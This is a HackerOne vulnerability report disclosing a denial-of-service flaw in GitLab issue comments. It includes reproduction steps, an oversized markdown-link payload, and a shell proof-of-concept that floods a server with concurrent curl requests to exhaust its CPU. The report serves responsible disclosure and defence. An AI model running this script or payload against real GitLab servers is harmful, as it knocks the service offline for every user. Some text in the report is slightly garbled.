DoS attack via comment on Issue
HackerOne report #557154 by 8ayac
on 2019-04-30, assigned to asaba
:
Corresponding Security Issue
https://dev.gitlab.org/gitlab/gitlabhq/issues/2881
Summary
There is no limit to the number of characters in the issue comments, which allows a DoS attack. The DoS attack affects both server-side and client-side.
NOTE: This bug happens on GitLab.com.
Steps to reproduce
▼Attack for Client-side
- Sign in to GitLab.
- Create a project as below:
- Project name: test01
- Project slug: test01
- Visibility Level: Public
- Initialize repository with README: Checked
- Create a new issue for the project created in Step 2.
- Post some comments on the Issue created in Step 3.
- Post a comment as below:
[a](/a/a/a/a/a/a/a/a/a/a/a/a/a/a.....(50000 times))
- Reload the Issue page.
Result: I received an error message "Something went wrong while fetching comments. Please try again." And I could not fetch all the comments.
Note: In Step 5, if you can not post the comment from the browser, send the HTTP request directly in some way.
Note: The string to post in step 5 is described in the attached file payload.txt.
- PoC movie: poc1.mp4
▼Attack for Server-side
An attacker can exhaust server resources by continuously sending the requests generated in Step 5 of [Attack for Client-side]. This causes a denial of service to all users.
For example, you can verify it with a script as below:
# !/bin/sh
charBlock=$(head -c 50000 /dev/zero | sed -e 's/\x00/\/a/g')
payload='[a]('$charBlock')'
gitlabHost=$1
ProjectURL=$2
targetID=$3
loop=$4
curl=`cat << EOS
curl
--insecure
--silent
--output /dev/null
${ProjectURL}/notes?target_id=${targetID}\&target_type=issue
--header 'Host: ${gitlabHost}'
--header 'X-CSRF-Token: [PLACEHOLDER]'
-b '_gitlab_session=[PLACEHOLDER]'
--data-binary 'note%5Bnoteable_type%5D=Issue¬e%5Bnoteable_id%5D=3¬e%5Bnote%5D=${payload}&merge_request_diff_head_sha=undefined'
EOS`
for i in `seq ${loop}`
do
eval ${curl}&
done
Run the above script with the following command to see that the server's CPU is exhausted.
$ ./poc.sh [GitLab host] [Project URL] [target ID(※1)] [Repeat count of request]
※1: Get from the request generated in step 5 of [Client-side attack].
- PoC movie: poc2.mp4
Results of GitLab environment info
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.5.3p105
Gem Version: 2.7.6
Bundler Version:1.17.3
Rake Version: 12.3.2
Redis Version: 3.2.12
Git Version: 2.18.1
Sidekiq Version:5.2.5
Go Version: unknown
GitLab information
Version: 11.10.2
Revision: f3e84e78b62
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 9.6.11
URL: https://gitlab.example.com
HTTP Clone URL: https://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 9.0.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
Impact for client-side
All comments on Issue will be inaccessible.
Impact for server-side:
The CPU is exhausted and users will be able to access the GitLab service.
NOTE: All users who can comment on the issue can exploit this vulnerability.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!